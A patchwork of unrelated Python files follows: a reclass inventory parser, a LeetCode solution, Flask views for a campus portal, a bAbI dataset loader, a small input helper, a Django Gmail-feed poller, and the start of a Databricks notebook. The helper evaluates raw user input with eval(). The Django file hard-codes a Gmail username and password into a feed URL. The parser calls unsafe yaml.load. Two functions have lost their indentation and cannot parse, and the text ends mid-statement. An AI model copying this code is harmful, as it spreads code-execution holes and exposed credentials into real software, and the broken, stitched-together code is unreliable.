        Mutates and returns *a*.  Raises on conflicting leaf values; *path*
        tracks the key chain for the error message.
        """
        if path is None:
            path = []
        for key in b:
            if key in a:
                if isinstance(a[key], dict) and isinstance(b[key], dict):
                    self.dict_deep_merge(a[key], b[key], path + [str(key)])
                elif a[key] == b[key]:
                    pass  # same leaf value
                else:
                    raise Exception(
                        'Conflict at {}'.format('.'.join(path + [str(key)])))
            else:
                a[key] = b[key]
        return a

    def list_formulas(self):
        """Parse every formula directory into a metadata dict keyed by name."""
        output = {}
        services = glob.glob('{}/*'.format(self.get_base_dir()))
        for service in services:
            if os.path.exists(service):
                service_name = service.split('/')[-1]
                # README parsing is best-effort: missing or malformed docs
                # are logged and yield an empty readme entry.
                try:
                    readme_data = self.parse_readme_file(service)
                except FileNotFoundError as exception:
                    logger.error(exception)
                    readme_data = {}
                except ApplicationError as exception:
                    logger.error(exception)
                    readme_data = {}
                output[service_name] = {
                    'path': service,
                    'metadata': self.parse_metadata_file(service),
                    'readme': readme_data,
                    'schemas': self.parse_schema_files(service),
                    'support_files': self.parse_support_files(service),
                }
        return output

    def parse_metadata_file(self, formula):
        """Load the formula's metadata.yml (YAML or JSON)."""
        # NOTE(review): the leading '/' makes this an absolute path even when
        # *formula* is already absolute — confirm the intended path shape.
        metadata_file = '/{}/metadata.yml'.format(formula)
        return utils.load_yaml_json_file(metadata_file)

    def parse_readme_file(self, formula):
        """Parse the formula's README.rst and return its section tree."""
        settings = OptionParser(
            components=(Parser,)).get_default_values()
        parser = Parser()
        input_file = open('{}/README.rst'.format(formula))
        input_data = input_file.read()
        document = new_document(input_file.name, settings)
        parser.parse(input_data, document)
        visitor = SectionParserVisitor(document)
        visitor.reset_section_tree()
        document.walk(visitor)
        input_file.close()
        return visitor.get_section_tree()

    def parse_support_files(self, formula):
        """Return the names of all meta/*.yml support files of a formula."""
        output = []
        support_files = glob.glob('{}/*/meta/*.yml'.format(formula))
        for support_file in support_files:
            if os.path.exists(support_file):
                service_name = support_file.split('/')[-1].replace('.yml', '')
                output.append(service_name)
        return output

    def parse_schema_files(self, formula):
        """Return {'<service>-<role>': {'path': ...}} for all role schemas."""
        output = {}
        schemas = glob.glob('{}/*/schemas/*.yaml'.format(formula))
        for schema in schemas:
            if os.path.exists(schema):
                role_name = schema.split('/')[-1].replace('.yaml', '')
                service_name = schema.split('/')[-3]
                name = '{}-{}'.format(service_name, role_name)
                output[name] = {
                    'path': schema,
                    # 'valid': schema_validate(service_name, role_name)[name]
                }
        return output

    def walk_classes(self, ret_classes=True, ret_errors=False):
        '''
        Returns classes if ret_classes=True, else returns soft_params if
        ret_classes=False (or the list of parse errors if ret_errors=True).
        '''
        path = self.metadata['class_dir']
        classes = {}
        soft_params = {}
        errors = []
        # find classes
        for root, dirs, files in os.walk(path, followlinks=True):
            # skip hidden files and folders in reclass dir
            files = [f for f in files if not f[0] == '.']
            dirs[:] = [d for d in dirs if not d[0] == '.']
            # translate found init.yml to valid class name
            if 'init.yml' in files:
                class_file = root + '/' + 'init.yml'
                # [:-9] strips '/init.yml'
                class_name = class_file.replace(
                    path, '')[:-9].replace('/', '.')
                classes[class_name] = {'file': class_file}
            for f in files:
                if f.endswith('.yml') and f != 'init.yml':
                    class_file = root + '/' + f
                    # [:-4] strips '.yml'
                    class_name = class_file.replace(
                        path, '')[:-4].replace('/', '.')
                    classes[class_name] = {'file': class_file}
        # read classes
        for class_name, params in classes.items():
            with open(params['file'], 'r') as f:
                # read raw data
                raw = f.read()
                # collect ${_param:...} references
                # NOTE(review): pattern should be a raw string (r'\${...}').
                pr = re.findall('\${_param:(.*?)}', raw)
                if pr:
                    params['params_required'] = list(set(pr))
                # load yaml
                try:
                    # NOTE(review): yaml.load without an explicit Loader is
                    # unsafe/deprecated — consider yaml.safe_load.
                    data = yaml.load(raw)
                except yaml.scanner.ScannerError as e:
                    errors.append(params['file'] + ' ' + str(e))
                    pass
                # NOTE(review): if the very first file fails to parse,
                # `data` is unbound here (NameError); on later failures the
                # previous file's data is silently reused.
                if type(data) == dict:
                    if data.get('classes'):
                        params['includes'] = data.get('classes', [])
                    if data.get('parameters') and \
                       data['parameters'].get('_param'):
                        params['params_created'] = data['parameters']['_param']
                    if not(data.get('classes') or data.get('parameters')):
                        errors.append('{} file missing classes and '
                                      'parameters'.format(params['file']))
                else:
                    errors.append(params['file'] + ' ' + 'is not valid yaml')
        if ret_classes:
            return classes
        elif ret_errors:
            return errors
        # find parameters and its usage
        for class_name, params in classes.items():
            for pn, pv in params.get('params_created', {}).items():
                # create param if missing
                if pn not in soft_params:
                    soft_params[pn] = {'created_at': {}, 'required_at': []}
                # add created_at
                if class_name not in soft_params[pn]['created_at']:
                    soft_params[pn]['created_at'][class_name] = pv
            for pn in params.get('params_required', []):
                # create param if missing
                if pn not in soft_params:
                    soft_params[pn] = {'created_at': {}, 'required_at': []}
                # add created_at
                soft_params[pn]['required_at'].append(class_name)
        return soft_params

    def list_classes(self, prefix=None):
        '''
        Returns list of all classes defined in reclass inventory. You can
        filter returned classes by prefix.
        '''
        # serve from the (class-level) cache when already populated;
        # NOTE(review): the prefix filter is ignored on cache hits.
        if len(self.class_cache) > 0:
            return self.class_cache
        data = self.walk_classes(ret_classes=True)
        return_data = {}
        for name, datum in data.items():
            # strip the leading '.' produced by walk_classes
            name = name[1:]
            if prefix is None:
                return_data[name] = datum
            elif name.startswith(prefix):
                return_data[name] = datum
        if len(self.class_cache) == 0:
            self.class_cache = OrderedDict(sorted(return_data.items(),
                                                  key=lambda t: t[0]))
        return self.class_cache

    def list_service_classes(self):
        """Classes under the 'service.' namespace."""
        return self.list_classes('service.')

    def list_system_classes(self):
        """Classes under the 'system.' namespace."""
        return self.list_classes('system.')

    def list_cluster_classes(self):
        """Classes under the 'cluster.' namespace."""
        return self.list_classes('cluster.')

    def get_class(self, name):
        '''
        Returns detailed information about class file in reclass inventory.
        '''
        classes = self.list_classes()
        return {
            name: classes.get(name)
        }
|
# -*- coding: utf-8 -*-
from typing import List
class Solution:
    def countNegatives(self, grid: List[List[int]]) -> int:
        """Count negative numbers in a matrix whose rows and columns are
        sorted in non-increasing order.

        Walks a staircase starting at the top-right corner: a negative cell
        implies everything below it in that column is negative too, so the
        whole remainder of the column is counted at once.  O(rows + cols).
        """
        rows = len(grid)
        row, col = 0, len(grid[0]) - 1
        negatives = 0
        while row < rows and col >= 0:
            if grid[row][col] < 0:
                # every cell below (row, col) in this column is also negative
                negatives += rows - row
                col -= 1
            else:
                row += 1
        return negatives
if __name__ == "__main__":
    # Smoke tests: (matrix, expected negative count) pairs.
    cases = [
        ([[4, 3, 2, -1], [3, 2, 1, -1], [1, 1, -1, -2], [-1, -1, -2, -3]], 8),
        ([[3, 2], [1, 0]], 0),
        ([[1, -1], [-1, -1]], 3),
        ([[-1]], 1),
    ]
    solution = Solution()
    for grid, expected in cases:
        assert expected == solution.countNegatives(grid)
|
from flask import Blueprint, render_template, request, flash, jsonify
from flask_login import login_required, current_user
from .models import Bookmark, Note,User,Profiles,Posts ,competitions, internships_job
from . import db
import json
from datetime import datetime, timedelta
import os
views = Blueprint('views', __name__)
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
### Home Page ###
### Home Page ###
@views.route('/dashboard', methods=['GET'])
@login_required
def home():
    """Render the dashboard menu for the logged-in user with a pool of
    motivational quotes for the template to pick from."""
    daily_quotes = [
        "The gem cannot be polished without friction, nor man perfected without trials.",
        "Everyone who got where he is has had to begin where he was.",
        "Remember, you can earn more money, but when time is spent is gone forever.",
        "It's your aptitude, not just your attitude that determines your ultimate altitude.",
        "We will either find a way, or make one.",
        "To reach a great height a person needs to have great depth.",
        "No dream comes true until you wake up and go to work.",
        "Wind to thy wings. Light to thy path. Dreams to thy heart.",
    ]
    return render_template("menu.html", details=[current_user, daily_quotes])
### Home Page Ends ###
### TaskPage ###
### TaskPage ###
@views.route('/tasks', methods=['GET', 'POST'])
@login_required
def task():
    """List the user's tasks; on POST validate and store a new task note.

    The optional deadline arrives as an HTML ``datetime-local`` value
    ("YYYY-MM-DDTHH:MM").  A deadline in the past is rejected with a flash
    message; when the deadline is missing or malformed the note is stored
    with date "None" (the except branch is the deliberate fallback path).

    Fix vs. original: the bare ``except:`` is narrowed to ``Exception`` so
    SystemExit/KeyboardInterrupt are no longer swallowed.
    """
    if request.method == 'POST':
        note = request.form.get('note')
        deadline = request.form.get('task-deadline')
        try:
            month = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
            deadline = deadline.split('T')
            task_date = deadline[0].split('-')
            task_year = task_date[0]
            task_month = month[int(task_date[1]) - 1]
            task_day = task_date[2]
            task_time = deadline[1]
            present = datetime.now()
            # flg is True when the deadline falls on today's date
            flg = present.year == int(task_year) and present.month == int(task_date[1]) and present.day == int(task_day)
            if flg and (int(task_time[:2]) < present.hour or (int(task_time[:2]) == present.hour and int(task_time[3:5]) <= present.minute)):
                flash('Time has already passed', category='error')
            elif (not flg) and datetime(int(task_year), int(task_date[1]), int(task_day)) < present:
                flash('Date has already passed', category='error')
            elif len(note) < 1:
                flash('Note is too short!', category='error')
            else:
                # store a human-readable deadline: "HH:MM DD Month YYYY"
                deadline = task_time + ' ' + task_day + ' ' + task_month + ' ' + task_year
                new_note = Note(data=note, date=deadline, user_id=current_user.id)
                db.session.add(new_note)
                db.session.commit()
        except Exception:
            # missing/unparseable deadline: save the note without one
            if len(note) < 1:
                flash('Note is too short!', category='error')
            else:
                new_note = Note(data=note, date="None", user_id=current_user.id)
                db.session.add(new_note)
                db.session.commit()
        note = ""
    return render_template("tasks.html", user=current_user)
@views.route('/delete-note', methods=['POST'])
@login_required
def delete_note():
    """Delete a note by id if it belongs to the current user.

    Expects JSON ``{"noteId": <id>}``; always returns an empty JSON object.
    Fix vs. original: ``@login_required`` added for consistency with the
    other views — the handler dereferences ``current_user.id``, which fails
    for anonymous visitors.
    """
    note = json.loads(request.data)
    noteId = note['noteId']
    note = Note.query.get(noteId)
    if note:
        # only the owner may delete their note
        if note.user_id == current_user.id:
            db.session.delete(note)
            db.session.commit()
    return jsonify({})
### TaskPage Ends ###
### TaskPage Ends ###
### Profile Page ###
### Profile Page ###
@views.route('/profile', methods=['GET', 'POST'])
@login_required
def profile():
    """Show and update the current user's profile.

    GET: render the profile page, creating an empty Profiles row on the
    first visit so the template always has one to display.
    POST: update the user's display name and all linked account handles,
    creating the Profiles row if it does not exist yet.
    """
    if request.method=='POST':
        # collect every field from the submitted form
        name = request.form.get('name')
        city = request.form.get('city')
        country = request.form.get('country')
        p_website = request.form.get('personal')
        linkedin = request.form.get('linkedin')
        github = request.form.get('github')
        devfolio = request.form.get('devfolio')
        cc = request.form.get('codechef')
        cf = request.form.get('codeforces')
        ac = request.form.get('atcoder')
        hackerrank = request.form.get('hackerrank')
        leetcode = request.form.get('leetcode')
        hackerearth = request.form.get('hackerearth')
        # the display name lives on the User row, not on Profiles
        user_n=User.query.get(current_user.id)
        user_n.full_name=name
        try:
            db.session.commit()
        except Exception as e:
            flash(e,category="error")
            db.session.rollback()
        # update the Profiles row if it exists, otherwise create it
        user = Profiles.query.filter_by(user_id=current_user.id).first()
        if user:
            user.codechef=cc
            user.codeforces=cf
            user.atcoder=ac
            user.hackerrank=hackerrank
            user.leetcode=leetcode
            user.hackerearth=hackerearth
            user.github=github
            user.devfolio=devfolio
            user.pwebsite=p_website
            user.linkedin=linkedin
            user.city=city
            user.country=country
            try:
                db.session.commit()
            except Exception as e:
                flash(e, category="error")
                db.session.rollback()
        else:
            pf = Profiles(codechef=cc,codeforces=cf,atcoder=ac,hackerrank=hackerrank,leetcode=leetcode,
                hackerearth=hackerearth,github=github,devfolio=devfolio,pwebsite=p_website,linkedin=linkedin,
                city=city,country=country,user_id=current_user.id)
            db.session.add(pf)
            db.session.commit()
        print(current_user.profiles[0])
        return render_template("profile.html", user=current_user)
    # GET: make sure a Profiles row exists before rendering
    user = Profiles.query.filter_by(user_id=current_user.id).first()
    if user:
        return render_template("profile.html",user=current_user)
    pf = Profiles(user_id=current_user.id)
    db.session.add(pf)
    db.session.commit()
    return render_template("profile.html", user=current_user)
### Profile Page Ends ###
### Profile Page Ends ###
### Post ###
@views.route('/inputpost', methods=['GET','POST'])
@login_required
def inputpost():
if request.method=='POST':
title = request.form.get('title')
content = request.form.get('content')
type=request.form.get('type')
present=datetime.now()
date=present.strftime("%d-%m-%Y")
img_link=request.form.get('links')
post = Posts(title=title,content=content,type=type,date=date,img_link=img_link,contactid=current_user.email,author=current_user.full_name,rel_institution=current_user.institution_name,user_id=current_user.id)
db.session.add(post)
db.session.commit()
return render_template("postinput.html", user=current_user)
return render_template("postinput.html", user=current_user)
@views.route('/buyorsell', methods=['GET'])
@login_required
def buyorsell():
    """Show buy/sell posts from the current user's institution."""
    institution = current_user.institution_name
    matching = Posts.query.filter_by(type="BuyorSell", rel_institution=institution).all()
    return render_template("posts.html", det=[current_user, matching])
@views.route('/lostandfound', methods=['GET'])
@login_required
def lostandfound():
    """Show lost-and-found posts from the current user's institution."""
    institution = current_user.institution_name
    matching = Posts.query.filter_by(type="LostandFound", rel_institution=institution).all()
    return render_template("posts.html", det=[current_user, matching])
@views.route('/others', methods=['GET'])
@login_required
def otherposts():
    """Show miscellaneous posts from the current user's institution."""
    institution = current_user.institution_name
    matching = Posts.query.filter_by(type="Others", rel_institution=institution).all()
    return render_template("posts.html", det=[current_user, matching])
@views.route('/myposts', methods=['GET'])
@login_required
def myposts():
    """Show every post authored by the current user."""
    own_posts = Posts.query.filter_by(user_id=current_user.id).all()
    return render_template("myposts.html", det=[current_user, own_posts])
@views.route('/delete-post', methods=['POST'])
@login_required
def delete_post():
    """Delete a post by id if it belongs to the current user.

    Expects JSON ``{"postId": <id>}``; always returns an empty JSON object.
    Fix vs. original: ``@login_required`` added — the handler dereferences
    ``current_user.id``, which fails for anonymous visitors.
    """
    post = json.loads(request.data)
    postId = post['postId']
    post = Posts.query.get(postId)
    if post:
        # only the owner may delete their post
        if post.user_id == current_user.id:
            db.session.delete(post)
            db.session.commit()
    return jsonify({})
### Post Ends ###
### Post Ends ###
### bookmarks views and forms ###
@views.route('/createbookmark', methods=['GET','POST'])
@login_required
def inputbookmark():
    """Render the bookmark form; on POST store a bookmark for the user.

    Both the description and the link are required; otherwise the user is
    asked to complete the form.
    """
    if request.method == 'POST':
        description = request.form.get('content')
        link = request.form.get('links')
        if not (description and link):
            flash("Fill all the required credentials")
        else:
            new_bookmark = Bookmark(data=description, page_link=link, user_id=current_user.id)
            db.session.add(new_bookmark)
            db.session.commit()
    return render_template("createbookmark.html", user=current_user)
@views.route('/bookmarks', methods=['GET'])
@login_required
def viewbookmark():
    """Render the current user's saved bookmarks."""
    return render_template("bookmark.html", user=current_user)
@views.route('/delete-bookmark', methods=['POST'])
@login_required
def delete_bookmark():
    """Delete a bookmark by id if it belongs to the current user.

    Expects JSON ``{"bookId": <id>}``; always returns an empty JSON object.
    Fix vs. original: ``@login_required`` added — the handler dereferences
    ``current_user.id``, which fails for anonymous visitors.
    """
    bookmark = json.loads(request.data)
    bookmarkId = bookmark['bookId']
    bookmark = Bookmark.query.get(bookmarkId)
    if bookmark:
        # only the owner may delete their bookmark
        if bookmark.user_id == current_user.id:
            db.session.delete(bookmark)
            db.session.commit()
    return jsonify({})
### bookmarks views and forms Ends ###
### bookmarks views and forms Ends ###
### Internship/ views and forms ###
### Internship/ views and forms ###
@views.route('/internships', methods=['GET'])
@login_required
def internship():
    """List every internship posting."""
    intern_offers = internships_job.query.filter_by(type="INTERN").all()
    return render_template("job_internships.html", det=[current_user, intern_offers])
@views.route('/jobs', methods=['GET'])
@login_required
def fulltime_offers():
    """List every full-time job posting."""
    job_offers = internships_job.query.filter_by(type="FULL TIME").all()
    return render_template("job_internships.html", det=[current_user, job_offers])
@views.route('/jobinternform', methods=['GET', 'POST'])
@login_required
def jobinternform():
    """Render the job/internship form; on POST store a new posting.

    The deadline comes as an HTML ``datetime-local`` value and is
    reformatted to "HH:MM DD Month YYYY" before storage.

    Fixes vs. original: the bare ``except:`` is narrowed to ``Exception``;
    the local ``type`` no longer shadows the builtin (the model keyword
    ``type=`` is unchanged).
    """
    if request.method == 'POST':
        company = request.form.get('org')
        posting_type = request.form.get('type')
        role = request.form.get('role')
        stipend_sal = request.form.get('stipend')
        duration = request.form.get('duration')
        role_desc = request.form.get('desc')
        deadline = request.form.get('deadline')
        extra_benefits = request.form.get('extras')
        reg_link = request.form.get('link')
        open_to = request.form.get('author')
        try:
            month = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
            deadline = deadline.split('T')
            opp_date = deadline[0].split('-')
            opp_year = opp_date[0]
            opp_month = month[int(opp_date[1]) - 1]
            opp_day = opp_date[2]
            opp_time = deadline[1]
            # human-readable deadline: "HH:MM DD Month YYYY"
            deadline = opp_time + ' ' + opp_day + ' ' + opp_month + ' ' + opp_year
            new_opp = internships_job(company=company, type=posting_type, role=role, stipend_sal=stipend_sal, duration=duration, role_desc=role_desc, deadline=deadline, extra_benefits=extra_benefits, author=current_user.full_name, reg_link=reg_link, open_to=open_to, user_id=current_user.id)
            db.session.add(new_opp)
            db.session.commit()
        except Exception:
            flash("Error While Submission ", category="error")
    return render_template("job_internshipform.html", user=current_user)
@views.route('/delete-jobintern', methods=['POST'])
@login_required
def delete_job():
    """Delete a job/internship posting by id if the current user owns it.

    Expects JSON ``{"jobId": <id>}``; always returns an empty JSON object.
    Fix vs. original: ``@login_required`` added — the handler dereferences
    ``current_user.id``, which fails for anonymous visitors.
    """
    job = json.loads(request.data)
    jobId = job['jobId']
    job = internships_job.query.get(jobId)
    if job:
        # only the author may delete their posting
        if job.user_id == current_user.id:
            db.session.delete(job)
            db.session.commit()
    return jsonify({})
### Internship & Jobs views and forms Ends ###
### Internship & Jobs views and forms Ends ###
### Competition views and forms ###
### Competition views and forms ###
@views.route('/competition', methods=['GET'])
@login_required
def competition():
    """List every competition posting."""
    all_competitions = competitions.query.all()
    return render_template("competition.html", det=[current_user, all_competitions])
@views.route('/competitionform', methods=['GET', 'POST'])
@login_required
def competitionform():
    """Render the competition form; on POST store a new competition.

    Deadline, start and end dates arrive as HTML ``datetime-local`` values
    and are reformatted to "HH:MM DD Month YYYY" by the local ``daycal``
    helper before storage.

    Fix vs. original: the bare ``except:`` is narrowed to ``Exception`` so
    system-exiting exceptions are not swallowed.
    """
    if request.method == 'POST':
        title = request.form.get('title')
        organization = request.form.get('org')
        content = request.form.get('content')
        deadline = request.form.get('deadline')
        fromdate = request.form.get('fromdate')
        todate = request.form.get('todate')
        open_to = request.form.get('open_to')
        reg_link = request.form.get('link')
        try:
            def daycal(deadline):
                # "YYYY-MM-DDTHH:MM" -> "HH:MM DD Month YYYY"
                month = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
                deadline = deadline.split('T')
                opp_date = deadline[0].split('-')
                opp_year = opp_date[0]
                opp_month = month[int(opp_date[1]) - 1]
                opp_day = opp_date[2]
                opp_time = deadline[1]
                return opp_time + ' ' + opp_day + ' ' + opp_month + ' ' + opp_year
            deadline = daycal(deadline)
            fromdate = daycal(fromdate)
            todate = daycal(todate)
            new_competition = competitions(organization=organization, title=title, content=content, deadline=deadline, fromdate=fromdate, todate=todate, author=current_user.full_name, reg_link=reg_link, open_to=open_to, user_id=current_user.id)
            db.session.add(new_competition)
            db.session.commit()
        except Exception:
            flash("Error While Submission ", category="error")
    return render_template("competitionform.html", user=current_user)
@views.route('/delete-competition', methods=['POST'])
@login_required
def delete_competition():
    """Delete a competition by id if the current user owns it.

    Expects JSON ``{"compId": <id>}``; always returns an empty JSON object.
    Fix vs. original: ``@login_required`` added — the handler dereferences
    ``current_user.id``, which fails for anonymous visitors.
    """
    competition = json.loads(request.data)
    competitionId = competition['compId']
    competition = competitions.query.get(competitionId)
    if competition:
        # only the author may delete their competition
        if competition.user_id == current_user.id:
            db.session.delete(competition)
            db.session.commit()
    return jsonify({})
### competition views and forms Ends ### |
import os
from io import open
import torch
from ..data import Dataset, Field, Example, Iterator
class BABI20Field(Field):
    """Text field for the bAbI-20 tasks.

    Handles both flat inputs (query/answer strings) and nested ones (a
    story given as a list of sentences), padding stories to a fixed
    ``memory_size`` number of sentences.
    """

    def __init__(self, memory_size, **kwargs):
        super(BABI20Field, self).__init__(**kwargs)
        # maximum number of story sentences kept per example
        self.memory_size = memory_size
        # no unknown token: the bAbI vocabulary is closed
        self.unk_token = None
        self.batch_first = True

    def preprocess(self, x):
        """Preprocess a string, or each sentence of a story (list of strings)."""
        if isinstance(x, list):
            # explicit super(...) args are required inside a comprehension
            # (zero-argument super() fails in the comprehension's scope)
            return [super(BABI20Field, self).preprocess(s) for s in x]
        else:
            return super(BABI20Field, self).preprocess(x)

    def pad(self, minibatch):
        """Pad a minibatch; stories additionally get empty-sentence padding
        up to ``memory_size``."""
        if isinstance(minibatch[0][0], list):
            # nested case: pad every sentence to the longest sentence in the
            # whole batch by temporarily setting fix_length
            self.fix_length = max(max(len(x) for x in ex) for ex in minibatch)
            padded = []
            for ex in minibatch:
                # sentences are indexed in reverse order and truncated to memory_size
                nex = ex[::-1][:self.memory_size]
                padded.append(
                    super(BABI20Field, self).pad(nex)
                    + [[self.pad_token] * self.fix_length]
                    * (self.memory_size - len(nex)))
            # restore dynamic padding for subsequent (flat) calls
            self.fix_length = None
            return padded
        else:
            return super(BABI20Field, self).pad(minibatch)

    def numericalize(self, arr, device=None):
        """Convert padded tokens to tensors; stories become a stacked 3-D tensor."""
        if isinstance(arr[0][0], list):
            tmp = [
                super(BABI20Field, self).numericalize(x, device=device).data
                for x in arr
            ]
            arr = torch.stack(tmp)
            if self.sequential:
                arr = arr.contiguous()
            return arr
        else:
            return super(BABI20Field, self).numericalize(arr, device=device)
class BABI20(Dataset):
    """Dataset wrapper for Facebook's bAbI 1-20 question-answering tasks."""

    urls = ['http://www.thespermwhale.com/jaseweston/babi/tasks_1-20_v1-2.tar.gz']
    name = ''
    dirname = ''

    def __init__(self, path, text_field, only_supporting=False, **kwargs):
        """Parse one task file at *path* into (story, query, answer) examples.

        only_supporting: keep only the story sentences marked as supporting
        facts for each question.
        """
        fields = [('story', text_field), ('query', text_field), ('answer', text_field)]
        # batch by similar query length to reduce padding
        self.sort_key = lambda x: len(x.query)
        with open(path, 'r', encoding="utf-8") as f:
            triplets = self._parse(f, only_supporting)
            examples = [Example.fromlist(triplet, fields) for triplet in triplets]
        super(BABI20, self).__init__(examples, fields, **kwargs)

    @staticmethod
    def _parse(file, only_supporting):
        """Yield (story, query, answer) triplets from a raw bAbI task file.

        Each line is "<id> <text>"; id 1 starts a new story.  Statement
        lines end with '.', question lines are tab-separated
        "question \t answer \t supporting-fact-ids".
        """
        data, story = [], []
        for line in file:
            tid, text = line.rstrip('\n').split(' ', 1)
            if tid == '1':
                story = []
            # sentence
            if text.endswith('.'):
                story.append(text[:-1])
            # question
            else:
                # remove any leading or trailing whitespace after splitting
                query, answer, supporting = (x.strip() for x in text.split('\t'))
                if only_supporting:
                    # keep only the sentences cited as supporting facts
                    substory = [story[int(i) - 1] for i in supporting.split()]
                else:
                    substory = [x for x in story if x]
                data.append((substory, query[:-1], answer))  # remove '?'
                # placeholder keeps sentence indices aligned after a question
                story.append("")
        return data

    @classmethod
    def splits(cls, text_field, path=None, root='.data', task=1, joint=False, tenK=False,
               only_supporting=False, train=None, validation=None, test=None, **kwargs):
        """Create train/validation/test splits for one task (or all, if joint)."""
        assert isinstance(task, int) and 1 <= task <= 20
        if tenK:
            cls.dirname = os.path.join('tasks_1-20_v1-2', 'en-valid-10k')
        else:
            cls.dirname = os.path.join('tasks_1-20_v1-2', 'en-valid')
        if path is None:
            path = cls.download(root)
        if train is None:
            if joint:  # put all tasks together for joint learning
                train = 'all_train.txt'
                if not os.path.isfile(os.path.join(path, train)):
                    # concatenate the 20 per-task train files once
                    # NOTE(review): the loop variable shadows the `task`
                    # argument, so after this branch `task` is 20 — the
                    # test filename below is then qa20; confirm intent.
                    with open(os.path.join(path, train), 'w') as tf:
                        for task in range(1, 21):
                            with open(
                                    os.path.join(path,
                                                 'qa' + str(task) + '_train.txt')) as f:
                                tf.write(f.read())
            else:
                train = 'qa' + str(task) + '_train.txt'
        if validation is None:
            if joint:  # put all tasks together for joint learning
                validation = 'all_valid.txt'
                if not os.path.isfile(os.path.join(path, validation)):
                    with open(os.path.join(path, validation), 'w') as tf:
                        for task in range(1, 21):
                            with open(
                                    os.path.join(path,
                                                 'qa' + str(task) + '_valid.txt')) as f:
                                tf.write(f.read())
            else:
                validation = 'qa' + str(task) + '_valid.txt'
        if test is None:
            test = 'qa' + str(task) + '_test.txt'
        return super(BABI20,
                     cls).splits(path=path, root=root, text_field=text_field, train=train,
                                 validation=validation, test=test, **kwargs)

    @classmethod
    def iters(cls, batch_size=32, root='.data', memory_size=50, task=1, joint=False,
              tenK=False, only_supporting=False, sort=False, shuffle=False, device=None,
              **kwargs):
        """Convenience constructor: build the field, splits, vocab and iterators."""
        text = BABI20Field(memory_size)
        train, val, test = BABI20.splits(text, root=root, task=task, joint=joint,
                                         tenK=tenK, only_supporting=only_supporting,
                                         **kwargs)
        text.build_vocab(train)
        return Iterator.splits((train, val, test), batch_size=batch_size, sort=sort,
                               shuffle=shuffle, device=device)
|
def input(val):
    """Prompt the user for a value and return the evaluated result.

    WARNING: this function shadows the builtin ``input``.  The original body
    called ``input(...)``, which resolved to this very function and recursed
    forever; ``builtins.input`` is used explicitly to break the recursion.
    *val* is ignored (kept for interface compatibility).
    """
    import builtins
    # SECURITY: eval of raw user input executes arbitrary code; prefer
    # ast.literal_eval if only literals are expected.
    val = eval(builtins.input("enter the choose value:"))
    a = 5  # unused in the original; kept for compatibility
    return val
def compaire(val, a):
    """Compare *val* and *a*, print and return a message describing the result.

    Fixes vs. original: the printed messages were garbled ("enter the number
    is greater" / "entered number is greater than"), the equal case was
    silently ignored, and nothing was returned.  The message is now returned
    as well so callers can test the outcome.
    """
    if a > val:
        msg = "a is greater than val"
    elif a < val:
        msg = "val is greater than a"
    else:
        msg = "val and a are equal"
    print(msg)
    return msg
|
# Create your views here.
# directory: workstatus/mail
from string import*
from django.http import HttpResponse
from django.template import Context
from django.template.loader import get_template
import workstatus.mail.models
from django.core.mail import send_mail
from datetime import datetime
import feedparser
from django.contrib.auth.models import User
from workstatus.mail.loaddb import addMessage, addUser
from workstatus.mail.models import Message, User
from workstatus.sendingMassEmail.views import *
from datetime import date
import time, os
import smtplib
#Settings
# SECURITY: credentials are hard-coded in source (and PASSWORD carries a
# leading space that is sent verbatim) — move these to environment
# variables or a secrets store.
USERNAME="umanage.mpd@gmail.com"
PASSWORD=" yashar2bananapeel"
PROTO="https://"
SERVER="mail.google.com"
PATH="/gmail/feed/atom"
# Fetch the Gmail Atom feed once at import time to seed the change detector.
# NOTE(review): module-level network I/O runs on every import and raises if
# the feed is unreachable — confirm this is intended.
getInitialFeed = feedparser.parse(PROTO + USERNAME + ":" + PASSWORD + "@" + SERVER + PATH)
lastModified = getInitialFeed.entries[0].modified
ignoreList = []
###########################################################################################################
def read(request):
getInitialFeed = feedparser.parse(PROTO + USERNAME + ":" + PASSWORD + "@" + SERVER + PATH)
lastModified = getInitialFeed.entries[0].modified
while True:
scrapedFeed = feedparser.parse(PROTO+USERNAME+":"+PASSWORD+"@"+SERVER+PATH)
scrapedModified = scrapedFeed.entries[0].modified
if lastModified < scrapedModified: #if there is a new message
lastModified = scrapedModified
name1 = scrapedFeed.entries[0].author_detail.name #get details
email1 = scrapedFeed.entries[0].author_detail.email
content = str(scrapedFeed.entries[0].title)
try:
user = User.objects.get(email = email1) #try to get user who sent it from database
except:
x = find(name1,' ')+1 #if user does not exist, create user in database
first = name1[:x]
addUser(name1, email1, first)
user = User.objects.get(email = email1)
time1 = str(scrapedModified) #parse into string so it can be sliced
time2 = time1[:10]+' '+time1[11:19] #edit string into a time that can be parsed
time3 = datetime.strptime(time2, '%Y-%m-%d %H:%M:%S') #parse string into a datetime object
addMessage(user, email1, content, time3) #add new Message object to database
current = str(time.strftime('%X'))
today = date.today()
dayofweek = today.isoweekday()
check(current, dayofweek)
return HttpResponse()
############################################################################################################
def parser(request):
    """Render the (up to) 10 most recent messages, newest first, via testing.html.

    Example message content: "What needs to get done: #Project1, #Project2".
    The newest entry is split out as content0/user0/time0 and removed from
    the list before rendering.

    NOTE(review): raises IndexError when there are no messages at all
    (``showEntries[0]`` on an empty list) -- confirm that is acceptable.
    """
    showEntries = []
    m = Message.objects.all()
    # Cap the number of rendered entries at 10.
    if len(m) < 10: length = len(m)
    else: length = 10
    for i in range(0,length):
        showEntries.append(m[len(m)-1-i]) #add latest object, which is at end of m
    content0 = showEntries[0].content
    user0 = showEntries[0].user.username
    time0 = str(showEntries[0].time1)
    showEntries.remove(showEntries[0])
    template = get_template('testing.html')
    variables = Context({'showEntries':showEntries, 'content0':content0, 'time0':time0, 'user0':user0})
    output = template.render(variables)
    return HttpResponse(output)
#############################################################################################################
def user_page(request, username):
    """Render user_page.html listing every Message authored by *username*."""
    author = User.objects.get(username=username)
    authored_messages = Message.objects.filter(user=author)
    context = Context({'messages': authored_messages})
    return HttpResponse(get_template('user_page.html').render(context))
|
# Databricks notebook source
# MAGIC %run "Users/mblahay@gmail.com/Demo Credentials"
# COMMAND ----------
#Setting up snowflake authentication
# Connection options for the Spark-Snowflake connector. sfUser/sfPassword
# come from the "Demo Credentials" notebook run in the first cell.
# NOTE(review): the ADLS account key and Snowflake password flow through
# notebook state -- prefer a secret scope.
snowflake_options = {
